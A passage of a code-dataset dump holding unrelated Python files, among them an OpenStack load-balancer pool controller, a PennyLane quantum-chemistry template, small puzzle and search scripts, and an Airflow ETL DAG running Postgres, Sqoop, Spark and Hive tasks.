octavia_proxy.api.drivers import driver_factory\nfrom octavia_proxy.api.drivers import utils as driver_utils\nfrom octavia_proxy.api.v2.controllers import base, member, health_monitor\nfrom octavia_proxy.api.v2.types import pool as pool_types\nfrom octavia_proxy.api.common import types\nfrom octavia_proxy.common import constants, validate, exceptions\nfrom octavia_proxy.i18n import _\n\nCONF = cfg.CONF\nLOG = logging.getLogger(__name__)\n\n\nclass PoolsController(base.BaseController):\n RBAC_TYPE = constants.RBAC_POOL\n\n def __init__(self):\n super().__init__()\n\n @wsme_pecan.wsexpose(pool_types.PoolRootResponse, wtypes.text,\n [wtypes.text], ignore_extra_args=True)\n def get_one(self, id, fields=None):\n \"\"\"Gets a pool's details.\"\"\"\n pcontext = pecan_request.context\n context = pecan_request.context.get('octavia_context')\n query_params = pcontext.get(constants.PAGINATION_HELPER).params\n is_parallel = query_params.pop('is_parallel', True)\n\n pool = self.find_pool(context, id, is_parallel)[0]\n self._auth_validate_action(context, pool.project_id,\n constants.RBAC_GET_ONE)\n\n if fields is not None:\n pool = self._filter_fields([pool], fields)[0]\n return pool_types.PoolRootResponse(pool=pool)\n\n @wsme_pecan.wsexpose(pool_types.PoolsRootResponse, wtypes.text,\n [wtypes.text], ignore_extra_args=True)\n def get_all(self, project_id=None, fields=None):\n \"\"\"Lists all pools.\"\"\"\n pcontext = pecan_request.context\n context = pcontext.get('octavia_context')\n\n query_filter = self._auth_get_all(context, project_id)\n pagination_helper = pcontext.get(constants.PAGINATION_HELPER)\n\n query_params = pagination_helper.params\n query_filter.update(query_params)\n\n is_parallel = query_filter.pop('is_parallel', True)\n allow_pagination = CONF.api_settings.allow_pagination\n\n 
links = []\n result = driver_invocation(\n context, 'pools', is_parallel, query_filter\n )\n\n if allow_pagination:\n result_to_dict = [pl_obj.to_dict() for pl_obj in result]\n temp_result, temp_links = pagination_helper.apply(result_to_dict)\n links = [types.PageType(**link) for link in temp_links]\n result = self._convert_sdk_to_type(\n temp_result, pool_types.PoolFullResponse\n )\n\n if fields is not None:\n result = self._filter_fields(result, fields)\n return pool_types.PoolsRootResponse(\n pools=result, pools_links=links)\n\n @wsme_pecan.wsexpose(pool_types.PoolRootResponse,\n body=pool_types.PoolRootPOST, status_code=201)\n def post(self, pool_):\n \"\"\"Creates a pool on a load balancer or listener.\n\n Note that this can optionally take a listener_id with which the pool\n should be associated as the listener's default_pool. If specified,\n the pool creation will fail if the listener specified already has\n a default_pool.\n \"\"\"\n\n pool = pool_.pool\n context = pecan_request.context.get('octavia_context')\n listener = None\n loadbalancer = None\n\n if not pool.project_id and context.project_id:\n pool.project_id = context.project_id\n\n self._auth_validate_action(\n context, pool.project_id, constants.RBAC_POST)\n if pool.loadbalancer_id:\n loadbalancer = self.find_load_balancer(\n context, pool.loadbalancer_id)[0]\n pool.loadbalancer_id = loadbalancer.id\n elif pool.listener_id:\n listener = self.find_listener(context, pool.listener_id)[0]\n loadbalancer = self.find_load_balancer(\n context, listener.loadbalancers[0].id)[0]\n pool.loadbalancer_id = listener.loadbalancers[0].id\n else:\n msg = _(\"Must provide at least one of: \"\n \"loadbalancer_id, listener_id\")\n raise exceptions.ValidationException(detail=msg)\n\n if pool.listener_id and listener:\n self._validate_protocol(listener.protocol, pool.protocol)\n\n if pool.protocol in constants.PROTOCOL_UDP:\n self._validate_pool_request_for_tcp_udp(pool)\n\n if pool.session_persistence:\n sp_dict = pool.session_persistence.to_dict(render_unsets=False)\n validate.check_session_persistence(sp_dict)\n\n driver = driver_factory.get_driver(loadbalancer.provider)\n\n pool_dict = pool.to_dict(render_unsets=False)\n pool_dict['id'] = None\n\n if listener and listener.default_pool_id:\n raise exceptions.DuplicatePoolEntry()\n\n result = driver_utils.call_provider(\n driver.name, driver.pool_create,\n context.session,\n pool)\n\n return pool_types.PoolRootResponse(pool=result)\n\n @wsme_pecan.wsexpose(pool_types.PoolRootResponse, wtypes.text,\n body=pool_types.PoolRootPut, status_code=200)\n def put(self, id, pool_):\n \"\"\"Updates a pool on a load balancer.\"\"\"\n pool = pool_.pool\n context = pecan_request.context.get('octavia_context')\n\n orig_pool = self.find_pool(context, id)[0]\n\n self._auth_validate_action(\n context, orig_pool.project_id,\n constants.RBAC_PUT)\n\n # Load the driver early as it also provides validation\n driver = driver_factory.get_driver(orig_pool.provider)\n\n # Prepare the data for the driver data model\n pool_dict = pool.to_dict(render_unsets=False)\n\n result = driver_utils.call_provider(\n driver.name, driver.pool_update,\n context.session,\n orig_pool, pool_dict)\n\n return pool_types.PoolRootResponse(pool=result)\n\n @wsme_pecan.wsexpose(None, wtypes.text, status_code=204)\n def delete(self, id):\n \"\"\"Deletes a pool from a load balancer.\"\"\"\n context = pecan_request.context.get('octavia_context')\n\n pool = self.find_pool(context, id)[0]\n\n self._auth_validate_action(\n context, 
pool.project_id,\n constants.RBAC_DELETE)\n\n if pool.healthmonitor_id:\n raise exceptions.PoolInUseByHealthCheck(\n id=pool.id, healthmonitor_id=pool.healthmonitor_id)\n\n # Load the driver early as it also provides validation\n driver = driver_factory.get_driver(pool.provider)\n\n driver_utils.call_provider(\n driver.name, driver.pool_delete,\n context.session,\n pool)\n\n @pecan_expose()\n def _lookup(self, pool_id, *remainder):\n \"\"\"Overridden pecan _lookup method for custom routing.\n\n Verifies that the pool passed in the url exists, and if so decides\n which controller, if any, should control be passed.\n \"\"\"\n context = pecan_request.context.get('octavia_context')\n if pool_id and remainder and remainder[0] == 'members':\n remainder = remainder[1:]\n pool = self.find_pool(context, pool_id)[0]\n if not pool:\n LOG.info(\"Pool %s not found.\", pool_id)\n raise exceptions.NotFound(\n resource='pool',\n id=pool_id)\n if remainder:\n return member.MemberController(pool_id=pool.id), remainder\n return member.MembersController(pool_id=pool.id), remainder\n return None\n\n def _graph_create(self, session, lb, pool, hm=None, members=None,\n provider=None):\n if not hm:\n hm = pool.healthmonitor\n if not members:\n members = pool.members\n\n driver = driver_factory.get_driver(provider)\n\n if pool.protocol in constants.PROTOCOL_UDP:\n self._validate_pool_request_for_tcp_udp(pool)\n\n if pool.session_persistence:\n sp_dict = pool.session_persistence.to_dict(render_unsets=False)\n validate.check_session_persistence(sp_dict)\n\n result_pool = driver_utils.call_provider(\n driver.name, driver.pool_create,\n session, pool)\n if not result_pool:\n context = pecan_request.context.get('octavia_context')\n driver_utils.call_provider(\n driver.name, driver.loadbalancer_delete,\n context.session,\n lb, cascade=True)\n raise Exception('Pool {pool} creation failed'.format(\n pool=pool.name))\n\n new_hm = None\n if hm:\n if not hm.delay or not hm.type:\n raise exceptions.ValidationException(\n detail=\"Mandatory parameter is missing for healthmonitor.\")\n\n if result_pool.protocol in (constants.PROTOCOL_UDP):\n health_monitor.HealthMonitorController(\n )._validate_healthmonitor_request_for_udp(\n hm, result_pool.protocol)\n else:\n if hm.type in (constants.HEALTH_MONITOR_UDP_CONNECT):\n raise exceptions.ValidationException(detail=_(\n \"The %(type)s type is only supported for pools of \"\n \"type %(protocol)s.\") % {\n 'type': hm.type,\n 'protocol': '/'.join((constants.PROTOCOL_UDP))})\n\n hm_post = hm.to_hm_post(pool_id=result_pool.id,\n project_id=result_pool.project_id)\n new_hm = health_monitor.HealthMonitorController()._graph_create(\n session, lb=lb, hm_dict=hm_post, provider=result_pool.provider)\n\n # Now create members\n new_members = []\n if members:\n for m in members:\n member_post = m.to_member_post(\n project_id=result_pool.project_id)\n new_member = member.MembersController(result_pool.id)\\\n ._graph_create(session, lb, member_post,\n provider=result_pool.provider)\n new_members.append(new_member)\n full_response_pool = result_pool.to_full_response(members=new_members,\n healthmonitor=new_hm)\n return full_response_pool\n","repo_name":"opentelekomcloud-infra/octavia-proxy","sub_path":"octavia_proxy/api/v2/controllers/pool.py","file_name":"pool.py","file_ext":"py","file_size_in_byte":10638,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"31504466222","text":"r\"\"\"\nContains the AllSinglesDoubles template.\n\"\"\"\n# 
pylint: disable-msg=too-many-branches,too-many-arguments,protected-access\nimport numpy as np\nimport pennylane as qml\nfrom pennylane.operation import Operation, AnyWires\nfrom pennylane.ops import BasisState\n\n\nclass AllSinglesDoubles(Operation):\n r\"\"\"Builds a quantum circuit to prepare correlated states of molecules\n by applying all :class:`~.pennylane.SingleExcitation` and\n :class:`~.pennylane.DoubleExcitation` operations to\n the initial Hartree-Fock state.\n\n The template initializes the :math:`n`-qubit system to encode\n the input Hartree-Fock state and applies the particle-conserving\n :class:`~.pennylane.SingleExcitation` and\n :class:`~.pennylane.DoubleExcitation` operations which are implemented as\n `Givens rotations <https://en.wikipedia.org/wiki/Givens_rotation>`_ that act\n on the subspace of two and four qubits, respectively. The total number of\n excitation gates and the indices of the qubits they act on are obtained\n using the :func:`~.excitations` function.\n\n For example, the quantum circuit for the case of two electrons and six qubits\n is sketched in the figure below:\n\n |\n\n .. figure:: ../../_static/templates/subroutines/all_singles_doubles.png\n :align: center\n :width: 70%\n :target: javascript:void(0);\n\n |\n\n In this case, we have four single and double excitations that preserve the total-spin\n projection of the Hartree-Fock state. The :class:`~.pennylane.SingleExcitation` gate\n :math:`G` act on the qubits ``[0, 2], [0, 4], [1, 3], [1, 5]`` as indicated by the\n squares, while the :class:`~.pennylane.DoubleExcitation` operation :math:`G^{(2)}` is\n applied to the qubits ``[0, 1, 2, 3], [0, 1, 2, 5], [0, 1, 2, 4], [0, 1, 4, 5]``.\n\n The resulting unitary conserves the number of particles and prepares the\n :math:`n`-qubit system in a superposition of the initial Hartree-Fock state and\n other states encoding multiply-excited configurations.\n\n Args:\n weights (tensor_like): size ``(len(singles) + len(doubles),)`` tensor containing the\n angles entering the :class:`~.pennylane.SingleExcitation` and\n :class:`~.pennylane.DoubleExcitation` operations, in that order\n wires (Iterable): wires that the template acts on\n hf_state (array[int]): Length ``len(wires)`` occupation-number vector representing the\n Hartree-Fock state. ``hf_state`` is used to initialize the wires.\n singles (Sequence[Sequence]): sequence of lists with the indices of the two qubits\n the :class:`~.pennylane.SingleExcitation` operations act on\n doubles (Sequence[Sequence]): sequence of lists with the indices of the four qubits\n the :class:`~.pennylane.DoubleExcitation` operations act on\n\n .. details::\n :title: Usage Details\n\n Notice that:\n\n #. The number of wires has to be equal to the number of spin orbitals included in\n the active space.\n\n #. The single and double excitations can be generated with the function\n :func:`~.excitations`. See example below.\n\n An example of how to use this template is shown below:\n\n .. 
code-block:: python\n\n import pennylane as qml\n import numpy as np\n\n electrons = 2\n qubits = 4\n\n # Define the HF state\n hf_state = qml.qchem.hf_state(electrons, qubits)\n\n # Generate all single and double excitations\n singles, doubles = qml.qchem.excitations(electrons, qubits)\n\n # Define the device\n dev = qml.device('default.qubit', wires=qubits)\n\n wires = range(qubits)\n\n @qml.qnode(dev)\n def circuit(weights, hf_state, singles, doubles):\n qml.templates.AllSinglesDoubles(weights, wires, hf_state, singles, doubles)\n return qml.expval(qml.PauliZ(0))\n\n # Evaluate the QNode for a given set of parameters\n params = np.random.normal(0, np.pi, len(singles) + len(doubles))\n circuit(params, hf_state, singles=singles, doubles=doubles)\n \"\"\"\n\n num_wires = AnyWires\n grad_method = None\n\n def __init__(self, weights, wires, hf_state, singles=None, doubles=None, id=None):\n if len(wires) < 2:\n raise ValueError(\n f\"The number of qubits (wires) can not be less than 2; got len(wires) = {len(wires)}\"\n )\n\n if doubles is not None:\n for d_wires in doubles:\n if len(d_wires) != 4:\n raise ValueError(\n f\"Expected entries of 'doubles' to be of size 4; got {d_wires} of length {len(d_wires)}\"\n )\n\n if singles is not None:\n for s_wires in singles:\n if len(s_wires) != 2:\n raise ValueError(\n f\"Expected entries of 'singles' to be of size 2; got {s_wires} of length {len(s_wires)}\"\n )\n\n weights_shape = qml.math.shape(weights)\n exp_shape = self.shape(singles, doubles)\n if weights_shape != exp_shape:\n raise ValueError(f\"'weights' tensor must be of shape {exp_shape}; got {weights_shape}.\")\n\n self._hyperparameters = {\n \"hf_state\": qml.math.toarray(hf_state),\n \"singles\": singles,\n \"doubles\": doubles,\n }\n\n if hf_state.dtype != np.dtype(\"int\"):\n raise ValueError(f\"Elements of 'hf_state' must be integers; got {hf_state.dtype}\")\n\n super().__init__(weights, wires=wires, id=id)\n\n @property\n def num_params(self):\n return 1\n\n @staticmethod\n def compute_decomposition(\n weights, wires, hf_state, singles, doubles\n ): # pylint: disable=arguments-differ\n r\"\"\"Representation of the operator as a product of other operators.\n\n .. math:: O = O_1 O_2 \\dots O_n.\n\n\n\n .. seealso:: :meth:`~.AllSinglesDoubles.decomposition`.\n\n Args:\n weights (tensor_like): size ``(len(singles) + len(doubles),)`` tensor containing the\n angles entering the :class:`~.pennylane.SingleExcitation` and\n :class:`~.pennylane.DoubleExcitation` operations, in that order\n wires (Any or Iterable[Any]): wires that the operator acts on\n hf_state (array[int]): Length ``len(wires)`` occupation-number vector representing the\n Hartree-Fock state. 
``hf_state`` is used to initialize the wires.\n            singles (Sequence[Sequence]): sequence of lists with the indices of the two qubits\n                the :class:`~.pennylane.SingleExcitation` operations act on\n            doubles (Sequence[Sequence]): sequence of lists with the indices of the four qubits\n                the :class:`~.pennylane.DoubleExcitation` operations act on\n\n        Returns:\n            list[.Operator]: decomposition of the operator\n        \"\"\"\n        op_list = []\n\n        op_list.append(BasisState(hf_state, wires=wires))\n\n        for i, d_wires in enumerate(doubles):\n            op_list.append(qml.DoubleExcitation(weights[len(singles) + i], wires=d_wires))\n\n        for j, s_wires in enumerate(singles):\n            op_list.append(qml.SingleExcitation(weights[j], wires=s_wires))\n\n        return op_list\n\n    @staticmethod\n    def shape(singles, doubles):\n        r\"\"\"Returns the expected shape of the tensor that contains the circuit parameters.\n\n        Args:\n            singles (Sequence[Sequence]): sequence of lists with the indices of the two qubits\n                the :class:`~.pennylane.SingleExcitation` operations act on\n            doubles (Sequence[Sequence]): sequence of lists with the indices of the four qubits\n                the :class:`~.pennylane.DoubleExcitation` operations act on\n\n        Returns:\n            tuple(int): shape of the tensor containing the circuit parameters\n        \"\"\"\n        if singles is None or not singles:\n            if doubles is None or not doubles:\n                raise ValueError(\n                    f\"'singles' and 'doubles' lists can not be both empty;\"\n                    f\" got singles = {singles}, doubles = {doubles}\"\n                )\n            shape_ = (len(doubles),)\n        elif doubles is None or not doubles:\n            shape_ = (len(singles),)\n        else:\n            shape_ = (len(singles) + len(doubles),)\n\n        return shape_\n","repo_name":"PennyLaneAI/pennylane","sub_path":"pennylane/templates/subroutines/all_singles_doubles.py","file_name":"all_singles_doubles.py","file_ext":"py","file_size_in_byte":8482,"program_lang":"python","lang":"en","doc_type":"code","stars":1965,"dataset":"github-code","pt":"52"}
+{"seq_id":"17435986802","text":"''' Module for handling I/O in debug mode. '''\nimport logger\n\ndef _to_int(curr_str):\n    '''Tries to turn a string to int, returns -1 if not possible'''\n    try:\n        return int(curr_str)\n    except ValueError:\n        return -1\n\n\ndef get_player_cnt():\n    ''' Console prompts for number of players. '''\n    return int(input('Enter number of players: '))\n\n\ndef get_names(player_cnt):\n    ''' Console prompts for player names. '''\n    print('Please enter your names in a circular, clockwise order.')\n    names = []\n    for i in range(player_cnt):\n        curr_name = input('Enter player ' + str(i + 1) + ' name: ')\n        while curr_name == '':\n            curr_name = input('Enter player ' + str(i + 1) + ' name: ')\n\n        names.append(curr_name)\n\n    return names\n\n\ndef get_bid(name, possible_bids):\n    ''' Console prompts for a valid bid. '''\n    bid = _to_int(input('Enter ' + name + '\\'s bid from ' + str(possible_bids) + ': '))\n    while bid not in possible_bids:\n        bid = _to_int(input('Invalid bid, again: '))\n\n    return bid\n\n\ndef get_result(name, possible_results):\n    ''' Console prompts for a valid result. '''\n    result = _to_int(input('Enter ' + name + '\\'s result from ' + str(possible_results) + ': '))\n    while result not in possible_results:\n        result = _to_int(input('Invalid result, again: '))\n\n    return result\n\n\ndef show_scoreboard(player_names, target_round, scoreboard):\n    ''' Prints scoreboard in console. 
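Logs the round header and the player names; for rounds after the first, also logs the previous and the current scores. 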
'''\n    logger.log_info('\\nScoreboard - Round ' + str(target_round + 1))\n    logger.log_info(player_names)\n\n    if target_round > 0:\n        logger.log_info('Previous: ' + str(scoreboard[target_round - 1]))\n        logger.log_info('New: ' + str(scoreboard[target_round]))\n","repo_name":"cluntraru/GameMaster","sub_path":"src/whist_api/io_api/debug_io.py","file_name":"debug_io.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
+{"seq_id":"20398747415","text":"def get_absolute_time(string):\n    hour = int(string[:2])\n    minute = int(string[-2:])\n    return hour * 60 + minute\n\n\ndef get_time(integer):\n    hour = str(integer // 60)\n    minute = str(integer % 60)\n    if len(hour) == 1 and len(minute) == 1:\n        return \"0%s:0%s\" % (hour, minute)\n    if len(minute) == 1:\n        return \"%s:0%s\" % (hour, minute)\n    if len(hour) == 1:\n        return \"0%s:%s\" % (hour, minute)\n    return \"%s:%s\" % (hour, minute)\n\n\ndef get_bus_timetable(number, time):\n    start = get_absolute_time(\"09:00\")\n    bus_timetable = []\n    for i in range(number):\n        bus_timetable.append(start + i * time)\n    return bus_timetable\n\n\ndef solution(n, t, m, timetable):\n    absolute_time = []\n    for time in timetable:\n        absolute_time.append(get_absolute_time(time))\n\n    absolute_time.sort()\n    bus_timetable = get_bus_timetable(n, t)\n    buses = [[] for _ in range(len(bus_timetable))]\n\n    for i in range(len(bus_timetable)):\n        while absolute_time:\n            if len(buses[i]) < m:\n                if absolute_time[0] <= bus_timetable[i]:\n                    buses[i].append(absolute_time.pop(0))\n                else:\n                    break\n            else:\n                break\n\n    result = None\n    if len(buses[-1]) < m:\n        result = bus_timetable[-1]\n    elif len(buses[-1]) == m:\n        for j in range(len(buses[-1])-1, 0, -1):\n            if buses[-1][j] != buses[-1][j-1]:\n                result = buses[-1][j] - 1\n                break\n        else:\n            result = buses[-1][0] - 1\n\n    return get_time(result)\n\n","repo_name":"KhelKim/CodingPractice","sub_path":"Programmers/simulation/17678.py","file_name":"17678.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
+{"seq_id":"9509901707","text":"# 4-8\n\nimport random\n\ndef interpolation_search(data,val):\n    low=0\n    high=49\n    print('We Are Searching...')\n    while low<= high and val !=-1:\n        mid=low+int((val-data[low])*(high-low)/(data[high]-data[low]))\n        if val==data[mid]:\n            return mid\n        elif val< data[mid]:\n            print('%d is between %d[%3d] and the median %d[%3d], look for the left' %(val,low+1,data[low],mid+1,data[mid]))\n            high=mid-1\n        elif val>data[mid]:\n            print('%d is between %d[%3d] and the median %d[%3d], look for the right' %(val,mid+1,data[mid],high+1,data[high]))\n            low=mid+1\n    return -1\n\nval=1\ndata=[0]*50\nfor i in range(50):\n    data[i]=val\n    val=val+random.randint(1,5)\n    \nwhile True:\n    num=0\n    val=int(input('Please insert the value(1-150), insert -1 to exit: '))\n    if val==-1:\n        break\n    num=interpolation_search(data,val)\n    if num==-1:\n        print('##### Sorry! We didn\\'t find [%3d] #####' %val) \n    else:\n        print('Found [%3d] in index %2d' %(data[num],num+1))\nprint('The content of the data:')\nfor i in range(5):\n    for j in range(10):\n        print('%3d-%-3d' %(i*10+j+1,data[i*10+j]),end='')\n    print()","repo_name":"YiruDing/Daily-Coding-Practice-Py","sub_path":"Python_algo/Search/interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
+{"seq_id":"41299369454","text":"import 
datetime\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.postgres_operator import PostgresOperator\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.providers.mysql.operators.mysql import MySqlOperator\nfrom airflow.utils.dates import days_ago\nfrom airflow.operators.email_operator import EmailOperator\nfrom airflow.utils.email import send_email\n\n\nimport sys\nsys.path.append('/opt/airflow/scripts')\nsys.path.append('/opt/airflow/plugins/operators')\nfrom data_quality import PostgresDataQualityOperator\nimport sql_queries\n\n\ndef failure_function(context):\n dag_run = context.get('dag_run')\n msg = \"\"\" <h1> Test email notification </h1> \n The folder you are trying to open doesn't exist hence the task has Failed.\"\"\"\n subject = f\"DAG {dag_run} Failed\"\n send_email(to='benzativit@gmail.com', subject=subject, html_content=msg)\n\ndef success_function(context):\n dag_run = context.get('dag_run')\n msg = \"All task has executed successfully.\"\n subject = f\"DAG {dag_run} has completed\"\n send_email(to='benzativit@gmail.com', subject=subject, html_content=msg)\n\n\ndefault_args = {\n 'owner' : 'airflow',\n 'retries' : 1,\n 'retry_delay' : datetime.timedelta(minutes=3),\n}\n\ndag = DAG(\n 'hands_on_test',\n default_args = default_args,\n description = 'Data Pipeline',\n start_date = days_ago(1),\n schedule_interval = '@daily'\n)\n\nstart = DummyOperator(\n task_id = 'start',\n dag = dag\n)\n\n# conn_mysql = DummyOperator(\n# task_id = 'Conn_mysql_db',\n# dag = dag\n# )\n\n# drop_order = MySqlOperator(\n# task_id = 'drop_order_table',\n# dag = dag,\n# mysql_conn_id = 'mysql_db',\n# sql = sql_queries.drop_order_table,\n# autocommit = True\n# )\n\n# create_order = MySqlOperator(\n# task_id = 'create_order',\n# dag = dag,\n# mysql_conn_id = 'mysql_db',\n# sql = sql_queries.create_order_table,\n# autocommit = True\n# )\n\n# copy_order_data = MySqlOperator(\n# task_id = 'copy_order_data',\n# dag = dag,\n# mysql_conn_id = 'mysql_db', \n# sql = sql_queries.copy_order_data,\n# autocommit = True\n# )\n\nconn_postgres_db = DummyOperator(\n task_id = 'Conn_postgres_db',\n dag = dag\n)\n\n\ndrop_order_detail = PostgresOperator(\n task_id = 'drop_order_detail_table',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n postgres_conn_id = 'postgres_db',\n sql = sql_queries.drop_order_detail_table,\n autocommit = True\n)\n\ncreate_order_detail = PostgresOperator(\n task_id = 'create_order_detail',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n postgres_conn_id = 'postgres_db',\n sql = sql_queries.create_order_detail_table,\n autocommit = True\n)\n\ncopy_order_detail_data = PostgresOperator(\n task_id = 'copy_order_detail_data',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n postgres_conn_id = 'postgres_db',\n sql = sql_queries.copy_order_detail_data,\n autocommit = True\n)\n\ndrop_restaurant_detail = PostgresOperator(\n task_id = 'drop_restaurant_detail_table',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n postgres_conn_id = 'postgres_db',\n sql = sql_queries.drop_restaurant_detail_table,\n autocommit = True\n)\n\ncreate_restaurant_detail = PostgresOperator(\n task_id = 'create_restaurant_detail',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n postgres_conn_id = 
'postgres_db',\n sql = sql_queries.create_restaurant_detail_table,\n autocommit = True\n)\n\ncopy_restaurant_detail_data = PostgresOperator(\n task_id = 'copy_restaurant_detail_data',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n postgres_conn_id = 'postgres_db',\n sql = sql_queries.copy_restaurant_detail_data,\n autocommit = True\n)\n\npostgres_data_quality_check = PostgresDataQualityOperator(\n task_id = 'postgreq_data_quality_check',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n postgres_conn_id = 'postgres_db',\n data_quality_checks = sql_queries.postgres_data_quality_check\n)\n\ninstall_sqoop = BashOperator(\n task_id = 'install_sqoop',\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec hive-server bash /opt/sqoop/install_sqoop.sh ',\n dag = dag\n)\n\nimport_sqoop = BashOperator(\n task_id = 'import_sqoop',\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec hive-server bash /opt/sqoop/import_sqoop.sh ',\n dag = dag\n)\n\nspark_transform_order_table = BashOperator(\n task_id = 'spark_transform_order_table',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec spark-master /spark/bin/spark-submit --master local[*] --name spark_transform_order_table /home/script/transform_order_table.py '\n)\n\nspark_transform_restaurant_table = BashOperator(\n task_id = 'spark_transform_restaurant_table',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec spark-master /spark/bin/spark-submit --master local[*] --name spark_transform_restaurant_table /home/script/transform_restaurant_table.py '\n)\n\ncreate_hive_order_detail = BashOperator(\n task_id = 'create_hive_order_detail',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec hive-server hive -f /opt/hql/order_detail.hql '\n)\n\ncreate_hive_restaurant_detail = BashOperator(\n task_id = 'create_hive_restaurant_detail',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec hive-server hive -f /opt/hql/restaurant_detail.hql '\n)\n\nspark_create_order_detail_new = BashOperator(\n task_id = 'spark_create_order_detail_new',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec spark-master /spark/bin/spark-submit --master local[*] --name spark_create_order_detail_new /home/script/create_order_detail_new.py '\n)\n\nspark_create_restaurant_detail_new = BashOperator(\n task_id = 'spark_create_restaurant_detail_new',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec spark-master /spark/bin/spark-submit --master local[*] --name spark_create_restaurant_detail_new /home/script/create_restaurant_detail_new.py '\n)\n\ncreate_hive_order_detail_new = BashOperator(\n task_id = 'create_hive_order_detail_new',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec hive-server hive -f /opt/hql/order_detail_new.hql '\n)\n\ncreate_hive_restaurant_detail_new = BashOperator(\n task_id = 'create_hive_restaurant_detail_new',\n dag = dag,\n 
on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec hive-server hive -f /opt/hql/restaurant_detail_new.hql '\n)\n\ngenerate_sql_requirement = BashOperator(\n task_id = 'generate_sql_requirement',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec spark-master /spark/bin/spark-submit --master local[*] --name spark_create_restaurant_detail_new /home/script/sql_requirement.py '\n)\n\nspark_data_quality_check = BashOperator(\n task_id = 'spark_data_quality_check',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec spark-master /spark/bin/spark-submit --master local[*] --name spark_data_quality_check /home/script/dq_check.py '\n)\n\nend = DummyOperator(\n task_id = 'end',\n # on_failure_callback=failure_function,\n on_success_callback=success_function,\n dag = dag\n)\n\ntest_task_fail = DummyOperator(\n task_id = 'fail',\n on_failure_callback=failure_function,\n on_success_callback=success_function,\n dag = dag\n)\n\nopen_temp_folder = BashOperator(\n task_id='open_temp_folder',\n on_failure_callback=failure_function,\n on_success_callback=success_function,\n bash_command='cd temp_folder'\n )\n\n\nstart >> conn_postgres_db >> drop_order_detail >> create_order_detail >> copy_order_detail_data >> postgres_data_quality_check\nstart >> conn_postgres_db >> drop_restaurant_detail >> create_restaurant_detail >> copy_restaurant_detail_data >> postgres_data_quality_check\n# start >> conn_mysql >> drop_order >> create_order \npostgres_data_quality_check >> install_sqoop >> import_sqoop >> [ spark_transform_order_table, spark_transform_restaurant_table]\n\nspark_transform_order_table >> spark_create_order_detail_new >> spark_data_quality_check >> [create_hive_order_detail , create_hive_order_detail_new]\nspark_transform_restaurant_table >> spark_create_restaurant_detail_new >> spark_data_quality_check >> [create_hive_restaurant_detail , create_hive_restaurant_detail_new]\n[create_hive_order_detail, create_hive_restaurant_detail, create_hive_order_detail_new, create_hive_restaurant_detail_new] >> generate_sql_requirement >> end >> test_task_fail >> open_temp_folder\n\n","repo_name":"ativitbenz/Airflow","sub_path":"airflow/dags/dag.py","file_name":"dag.py","file_ext":"py","file_size_in_byte":9583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35872456031","text":"#!/usr/bin/python\n# -*- encoding: utf-8 -*-\n\nimport torchvision.utils\n\nfrom logger import setup_logger\n\nfrom models.model_stages import BiSeNet\n\nfrom cityscapes import CityScapes\nfrom loss.loss import OhemCELoss\nfrom loss.detail_loss import DetailAggregateLoss\nfrom evaluation import MscEvalV0\nfrom optimizer_loss import Optimizer\nfrom torchvision import transforms\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\n# import torch.distributed as dist\nfrom PIL import Image\nimport os\nimport os.path as osp\nimport logging\nimport time\nimport datetime\nimport argparse\n\nfrom torch.utils.tensorboard import SummaryWriter\n\nlogger = logging.getLogger()\nCUDA_ID = 3\ntorch.cuda.set_device(CUDA_ID)\n# summary = SummaryWriter(\"logs/board\"),\npatch_size = 40\n\n\ndef str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n 
